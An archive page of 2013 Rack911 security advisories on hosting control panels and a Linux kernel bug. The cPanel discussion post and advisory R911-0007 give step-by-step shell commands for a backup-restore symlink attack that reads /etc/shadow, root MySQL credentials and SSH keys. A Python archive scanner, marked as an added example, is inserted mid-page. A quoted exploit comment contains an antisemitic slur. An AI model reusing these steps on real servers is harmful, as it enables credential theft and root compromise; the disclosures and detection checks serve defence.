Archive for May, 2013

Interworx – Privilege Escalation (R911-0012)

Tuesday, May 28th, 2013

Type: Privilege Escalation
Impact: Critical
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #473 and v5.0.5 #513
CVE: -
R911: 0012
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. It supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

The lockmail binary (maildrop) has incorrect file permissions that make it possible for an attacker to run malicious exploit code, which would ultimately lead to a root compromise.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as CRITICAL due to the fact that a normal user can gain an instant root shell.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #473 + v5.0.5 #513.

Vendor Contact Timeline:

2013-05-05: Vendor contacted via email.
2013-05-05: Vendor confirms vulnerability.
2013-05-14: Vendor issues v4.11.6 #473 update.
2013-05-14: Vendor issues v5.0.5 #513 update.
2013-05-28: Rack911 issues security advisory.

Interworx – Content Disclosure (Root Access) #2 (R911-0011)

Tuesday, May 28th, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #473 and v5.0.5 #513
CVE: -
R911: 0011
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. It supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

The makemime binary (maildrop) has incorrect file permissions that make it possible for an attacker to create a hardlink (ln) to sensitive files, which could ultimately lead to a root compromise.

Proof of Concept:

Due to the nature of this vulnerability we are withholding the proof of concept until a later date to allow everyone ample time to update their software.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow and any private SSH keys.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #473 + v5.0.5 #513.

Vendor Contact Timeline:

2013-05-05: Vendor contacted via email.
2013-05-05: Vendor confirms vulnerability.
2013-05-20: Vendor issues v4.11.6 #473 update.
2013-05-20: Vendor issues v5.0.5 #513 update.
2013-05-28: Rack911 issues security advisory.

Interworx – Content Disclosure (Root Access) #1 (R911-0010)

Tuesday, May 28th, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #473 and v5.0.5 #512
CVE: -
R911: 0010
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. It supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

There is a flaw within the backup system that allows an attacker to create a hardlink (ln) to any file on the server, which is then stored in a user-accessible archive when the backup completes.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow and any private SSH keys.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #473 + v5.0.5 #512.

Vendor Contact Timeline:

2013-05-05: Vendor contacted via email.
2013-05-05: Vendor confirms vulnerability.
2013-05-07: Vendor issues v5.0.5 #512 update.
2013-05-14: Vendor issues v4.11.6 #473 update.
2013-05-28: Rack911 issues security advisory.

Interworx – Content Disclosure (MySQL Access) (R911-0009)

Tuesday, May 28th, 2013

Type: Content Disclosure (MySQL Access)
Impact: High
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #475 and v5.0.5 #516
CVE: -
R911: 0009
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. It supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

There is a flaw within the import / restore feature that allows an attacker to use a malicious archive to gain access to sensitive files via a symlink attack on the bandwidth reporting graphs. The attacker would be able to access any file owned by the iworx user, including the iworx.ini file, which contains in plain text the MySQL passwords for several important accounts and would ultimately allow access to all client-hosted databases.

Note: In order for this vulnerability to work, the attacker must social engineer the hosting company to restore the malicious archive. However, because transferring and restoring accounts is such a common practice in the hosting world we believe this exploit to be trivial to perform.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that MySQL access can be obtained as the ‘iworx’ user which is where all of the customer databases are stored. It would be the equivalent of compromising the root MySQL credentials with other control panels.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #475 + v5.0.5 #516.

Vendor Contact Timeline:

2013-05-19: Vendor contacted via email.
2013-05-20: Vendor confirms vulnerability.
2013-05-20: Vendor issues v4.11.6 #475 update.
2013-05-20: Vendor issues v5.0.5 #516 update.
2013-05-28: Rack911 issues security advisory.

cPnginx – Content Disclosure (Root Access) (R911-0008)

Wednesday, May 22nd, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: cPnginx
Website: http://www.cpnginx.com
Vulnerable Version: 6.2 and possibly earlier.
Fixed Version: 6.3
CVE: -
R911: 0008
Date: 2013-05-21
By: http://www.rack911.com

Product Description:

cPnginx is a cPanel nginx integration plugin. This plugin will increase your server performance and decrease server loads caused by the apache web server. Nginx + cPanel + Apache = Performance boosted secured hosting server.

Vulnerability Description:

cPnginx allows access to sensitive php scripts via a reseller due to the lack of ACL usage.

Through these php scripts an attacker is able to make nginx configuration changes which allow the attacker to view any file on the server. It is possible for the server to operate normally with these changes in place, and it is also possible to disable logging of malicious http requests, which means an attacker could obtain sensitive data without their activity being logged.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow, the MySQL root password, any private SSH keys, and every file in the /home directory can be viewed.

Work Around:

Upgrade to the latest version of cPnginx.

Vulnerable Version:

This vulnerability was tested against cPnginx 6.2 and it is believed that prior versions are also vulnerable.

cPanel Backup Vulnerability – Discussion

Wednesday, May 22nd, 2013

I’m sure some of you are wondering why we are still going through with this release despite cPanel issuing an official statement regarding their insecure handling of archives.

Well, it’s our opinion that we shouldn’t have to resort to WHT in the first place to bring attention to a serious security flaw. Our goal has always been to help make the hosting community safer and in this case we feel that push came to shove and without releasing the proof of concept, there really is no motivation for cPanel to expedite a proper workaround. A statement is nice and all but it’s a far cry from an actual fix for what they deemed to be a “minor” flaw.

People have to understand that this isn’t our first run-in with cPanel regarding security vulnerabilities going unpatched. Steven reported a serious MySQL flaw over a year ago and it remained unpatched for a long time before being silently fixed in some random build. At that time, cPanel had the same response: Do not restore from random MySQL backups or inspect each one. That was not a valid answer back then and it is not a valid answer today! The notion that providers should inspect every single archive they are restoring is ludicrous and an easy way out.

There are two direct competitors to cPanel that suffer from similar flaws and both of those companies have acted responsibly in terms of identifying the seriousness of these vulnerabilities and working on a proper fix. Unlike cPanel, they immediately accepted fault with their software and stopped what they were doing to focus on fixing it. Why is it that cPanel can’t take the same stance? Do they not care as much about their customers as other control panel companies? At what point is a serious security flaw no longer a high priority issue? These are questions we have been asking for a long time with cPanel.

Unfortunately, there are some people who agree with cPanel’s assessment that this is a minor flaw. We want to make this very clear to everyone else: This is a real functioning exploit that anyone can re-create, and it leads to a compromise of any cPanel server should the malicious archive be restored. Unless you feel that having the ability to read any file on the server, including the root MySQL password, or to obtain private SSH keys is something minor… then we urge you to continue to press cPanel for a proper workaround.

To the majority that support us, thank you. We have the security of the hosting community in mind and any release such as this is done with a lot of deep thought and discussion. There will be many more advisories coming from us in the weeks ahead, a lot of scary stuff out there but you can rest a little easier knowing that we’re doing our best to find vulnerabilities before malicious users do.

Here are the steps to create a malicious cPanel archive that, when restored, will allow you to view /etc/shadow, the root MySQL password in plain-text and the default root SSH private key. For demonstration purposes, we will be using attacker.com as our website and have already set up three subdomains:

rootmysql.attacker.com
rootssh.attacker.com
shadow.attacker.com

The subdomains are necessary because this attack revolves around symlinks that take the place of existing domain log files; when the archive is restored, each symlink is converted into a copy of the actual file it points to.

1. Log into your cPanel account and go to Backups and then Generate a Full Website Backup.

2. If you have SSH access on the same server you can log in, otherwise download the original archive to your computer and upload to another server where you do have SSH access.

3. Prepare the archive:

tar -xvf backup*.tar.gz
rm backup*.tar.gz
mv backup* cpmove-attack
cd cpmove-attack/logs

4. Prepare the malicious symlinks:

ln -s /etc/shadow shadow.attacker.com
ln -s /root/.my.cnf rootmysql.attacker.com
ln -s /root/.ssh/id_dsa rootssh.attacker.com

5. Repackage the archive:

cd ../../
tar -zcf cpmove-attack.tar.gz cpmove-attack

At this point the malicious archive has been built and you can upload it to the target server and then restore it via WHM using the Restore a Full Backup/cpmove File feature. Another option would be to restore it from the command line:

/scripts/restorepkg --force cpmove-attack.tar.gz

Once the archive has been restored on the target server, log into cPanel as the user and then go back to Backups and then Generate a Full Website Backup. After the new backup has been generated, download it to your computer and extract the contents. There will be a logs directory located under the archive name containing the target files. Simply open them with a text editor and there you go.

I have also attached a pre-built malicious archive that will do exactly as the written instructions above will do. Simply restore it via WHM and then log into cPanel to generate a new full backup and then download to view the target files. The username for cPanel is attack and the password is cpanelfail :)

To hosting providers who would like to help mitigate the risks of the above vulnerability, what we suggest for the time being is to run the following command against all archives that you are about to restore to check for the presence of a possible symlink attack:

tar -ztvf cpmove-attack.tar.gz | grep ' -> ' | egrep -v "(homedir/public_html|homedir/www)"

If the archive is fine you will not see anything. However, if there is a possible symlink attack present then the output will look like this:

root@server [~]# tar -ztvf cpmove-attack.tar.gz | grep ' -> ' | grep -v public_html
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootmysql.attacker.com -> /root/.my.cnf
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/shadow.attacker.com -> /etc/shadow
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootssh.attacker.com -> /root/.ssh/id_dsa
root@server [~]#

Should you see results like that, you are urged to not restore the backup under any circumstances and presume that the user is attempting to compromise your security. For now, this is our best advice but we are working on a better (automated) solution that can be worked into the existing cPanel restore feature. Stay tuned for details, we hope to have something out this week.

cPanel – Backup Restoration Content Disclosure (R911-0007)

Wednesday, May 22nd, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: 11.38.0.8 and earlier.
Fixed Version: -
CVE: -
R911: 0007
Date: 2013-05-22
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

There is a flaw within the import / restore feature that allows an attacker to use a malicious archive to gain access to sensitive files via a symlink attack due to an incorrect handling of the domain log files. When the malicious archive is restored the symlinks become normal files that can then be backed up and viewed by the user.

Note: In order for this vulnerability to work, the attacker must social engineer the hosting company to restore the malicious archive. However, because transferring and restoring accounts is such a common practice in the hosting world we believe this exploit to be trivial to perform.

Proof of Concept:

Here are the steps to create a malicious cPanel archive that, when restored, will allow you to view /etc/shadow, the root MySQL password in plain-text and the default root SSH private key. For demonstration purposes, we will be using attacker.com as our website and have already set up three subdomains:

rootmysql.attacker.com
rootssh.attacker.com
shadow.attacker.com

The subdomains are necessary because this attack revolves around symlinks that take the place of existing domain log files; when the archive is restored, each symlink is converted into a copy of the actual file it points to.

1. Log into your cPanel account and go to Backups and then Generate a Full Website Backup.

2. If you have SSH access on the same server you can log in, otherwise download the original archive to your computer and upload to another server where you do have SSH access.

3. Prepare the archive:

tar -xvf backup*.tar.gz
rm backup*.tar.gz
mv backup* cpmove-attack
cd cpmove-attack/logs

4. Prepare the malicious symlinks:

ln -s /etc/shadow shadow.attacker.com
ln -s /root/.my.cnf rootmysql.attacker.com
ln -s /root/.ssh/id_dsa rootssh.attacker.com

5. Repackage the archive:

cd ../../
tar -zcf cpmove-attack.tar.gz cpmove-attack

At this point the malicious archive has been built and you can upload it to the target server and then restore it via WHM using the Restore a Full Backup/cpmove File feature. Another option would be to restore it from the command line:

/scripts/restorepkg --force cpmove-attack.tar.gz

Once the archive has been restored on the target server, log into cPanel as the user and then go back to Backups and then Generate a Full Website Backup. After the new backup has been generated, download it to your computer and extract the contents. There will be a logs directory located under the archive name containing the target files. Simply open them with a text editor and there you go.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow, the MySQL root password and any private SSH keys. (It is also possible to grab multiple files at once using several symlink attacks within one malicious archive.)

It’s important to note that cPanel has deemed this vulnerability to be “minor” in their eyes which we view to be extremely reckless towards the security of every hosting provider out there. It is their opinion that web hosting providers should not transfer or restore accounts from untrusted sources. As we all know, this practice is extremely common with shared hosting and especially reseller hosting providers.

We cannot stress enough how inexcusable it is for cPanel to view this flaw as a minor vulnerability. An attacker could create their own malicious archive in minutes and come up with 100 different plausible excuses to have their hosting provider restore the archive without so much of a second thought. We’re trying to make the hosting community safer, but we cannot do it when companies such as cPanel continue to act like this.

Work Around:

To hosting providers who would like to help mitigate the risks of the above vulnerability, what we suggest for the time being is to run the following command against all archives that you are about to restore to check for the presence of a possible symlink attack:

tar -ztvf archive.tar.gz | grep ' -> ' | grep -v public_html

If the archive is fine you will not see anything. However, if there is a possible symlink attack present then the output will look like this:

root@server [~]# tar -ztvf cpmove-attack.tar.gz | grep ' -> ' | grep -v public_html
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootmysql.attacker.com -> /root/.my.cnf
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/shadow.attacker.com -> /etc/shadow
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootssh.attacker.com -> /root/.ssh/id_dsa
root@server [~]#

Should you see results like that, you are urged to not restore the backup under any circumstances and presume that the user is attempting to compromise your security. For now, this is our best advice but we are working on a better (automated) solution that can be worked into the existing cPanel restore feature. Stay tuned for details, we hope to have something out this week.
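A pre-restore check for the symlink attack described in the Discussion post above and in this advisory's workaround, as an added example that is not Rack911's or cPanel's code: it reimplements the `tar -ztvf ... | grep ' -> '` check in Python so it can be wired into a restore pipeline, and goes a little beyond the page by also flagging relative symlinks that climb out of the account and member names that escape the extraction directory. The allow-listed directories are an assumption taken from the page's own grep exclusion, and the sample archive is constructed in memory to mirror the cpmove-attack layout shown above.

```python
"""Pre-restore scan of a cpmove-style tar archive.  Added example, not Rack911's
or cPanel's code.  Flags symlinks (the page's ' -> ' check) plus member names
that would escape the extraction directory; allow-list and sample are constructed."""
import io
import posixpath
import tarfile

# Account-relative directories where symlinks are expected in a cpmove archive
# (assumption mirroring the page's egrep -v "(homedir/public_html|homedir/www)").
ALLOWED_LINK_DIRS = ("homedir/public_html", "homedir/www")


def _escapes(path):
    """True when a normalized relative path climbs above its starting directory."""
    return path == ".." or path.startswith("../")


def _account_relative(name):
    """Strip the leading 'cpmove-<user>/' component from a member name."""
    parts = name.split("/", 1)
    return parts[1] if len(parts) == 2 else ""


def suspicious_members(tar_bytes):
    """Return [(member, link_target, reason)] for entries that could expose or
    overwrite files outside the account when the archive is restored."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf.getmembers():
            name = posixpath.normpath(m.name)
            if name.startswith("/") or _escapes(name):
                findings.append((m.name, "", "member path escapes extraction directory"))
                continue
            if not m.issym():
                continue
            rel = _account_relative(name)
            target = posixpath.normpath(posixpath.join(posixpath.dirname(rel), m.linkname))
            if m.linkname.startswith("/"):
                findings.append((m.name, m.linkname, "absolute symlink target"))
            elif _escapes(target):
                findings.append((m.name, m.linkname, "relative symlink leaves the account"))
            elif not any(rel.startswith(d + "/") for d in ALLOWED_LINK_DIRS):
                findings.append((m.name, m.linkname, "symlink outside allow-listed directories"))
    return findings


def build_sample_archive():
    """Constructed in-memory archive laid out like the page's cpmove-attack.tar.gz,
    with one benign symlink and one ordinary log file for contrast."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        def add_file(name, data):
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tf.addfile(ti, io.BytesIO(data))

        def add_symlink(name, target):
            ti = tarfile.TarInfo(name)
            ti.type = tarfile.SYMTYPE
            ti.linkname = target
            tf.addfile(ti)

        add_file("cpmove-attack/logs/attacker.com", b"192.0.2.1 - - [22/May/2013] GET / 200\n")
        add_symlink("cpmove-attack/homedir/public_html/current", "releases/1")  # benign
        add_symlink("cpmove-attack/logs/shadow.attacker.com", "/etc/shadow")
        add_symlink("cpmove-attack/logs/rootmysql.attacker.com", "/root/.my.cnf")
        add_symlink("cpmove-attack/logs/rootssh.attacker.com", "/root/.ssh/id_dsa")
        add_symlink("cpmove-attack/logs/mysql.attacker.com", "../../../../root/.my.cnf")
        add_file("cpmove-attack/../../etc/cron.d/x", b"")  # traversal via member name
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_archive()
    for member, target, reason in suspicious_members(data):
        print(f"REFUSE restore: {reason}: {member} -> {target}")
```

Run it with the archive path as the only argument; with no argument it scans the constructed sample and reports the five bad entries while staying silent on the benign public_html symlink.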

Vulnerable Version:

This vulnerability was tested against cPanel (WHM) v11.38.0.8 and is believed to exist in all previous versions.

cPremote – Elevated Privileges (R911-0006)

Wednesday, May 22nd, 2013

Type: Elevated Privileges
Impact: Medium
Product: cPremote
Website: http://www.cpnginx.com
Vulnerable Version: 6.9 and possibly earlier.
Fixed Version: 6.10
CVE: -
R911: 0006
Date: 2013-05-21
By: http://www.rack911.com

Product Description:

cPremote is a remote rsync backup plugin for the famous hosting control panel cPanel. It is a WHM plugin. It backs up all your cPanel accounts to a remote server over ssh using an incremental backup method, so you can keep the backups of all your servers and cPanel accounts on a central backup server.

Vulnerability Description:

cPremote allows access to root only functions in the software to resellers. Through this vulnerability it is possible for an attacker to disable / modify server wide backup settings and restore any users backups (potentially overwriting customer data).

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as MEDIUM due to the fact that backups can be disabled and customer data can be overwritten by a reseller.

Work Around:

Upgrade to the latest version of cPremote.

Vulnerable Version:

This vulnerability was tested against cPremote 6.9 and it is believed that prior versions are also vulnerable.

Plesk – Content Disclosure (Root Access) (R911-0005)

Monday, May 20th, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: Plesk
Website: http://www.plesk.com
Vulnerable Version: v11.0.9 #49 and prior.
Fixed Version: v11.0.9 #50 and later.
CVE: -
R911: 0005
Date: 2013-05-20
By: http://www.rack911.com

Product Description:

Parallels “Plesk” allows a server administrator to set up new websites, reseller accounts, e-mail accounts, and DNS entries through a web-based interface. The administrator can create client and site templates, which predetermine resource-allocation parameters for the domains and/or clients.

Vulnerability Description:

There is a flaw within the website copying feature that allows an attacker to use a hardlink (ln) to any file on the server which will then be copied to the destination. This attack can be done by all users and SSH access is not required for it to work.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow and any private SSH keys.

Vulnerable Version:

This vulnerability was tested against Plesk v11.0.9 #49.

Fixed Version:

This vulnerability was patched in Plesk v11.0.9 #50 and later.

Vendor Contact Timeline:

2013-05-09: Vendor contacted via email.
2013-05-13: Vendor confirms vulnerability.
2013-05-14: Vendor issues v11.0.9 #50 update.
2013-05-20: Rack911 issues security advisory.

Kernel Exploit: CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access

Tuesday, May 14th, 2013

There is a new kernel exploit affecting a variety of Linux distributions. This is a privilege escalation exploit.

“The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.”

You can read about it here:

http://www.webhostingtalk.com/showthread.php?t=1266042

https://access.redhat.com/security/cve/CVE-2013-2094

https://bugzilla.redhat.com/show_bug.cgi?id=962792

https://news.ycombinator.com/item?id=5703758

http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck

From the exploit:

/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

There is a temporary workaround:

https://bugzilla.redhat.com/show_bug.cgi?id=962792#c13

There are some temporary rpms located here:

http://people.centos.org/hughesjr/c6kernel/2.6.32-358.6.1.el6.cve20132094/x86_64/

Server management customers of Rack911 are being proactively monitored and patched for this vulnerability.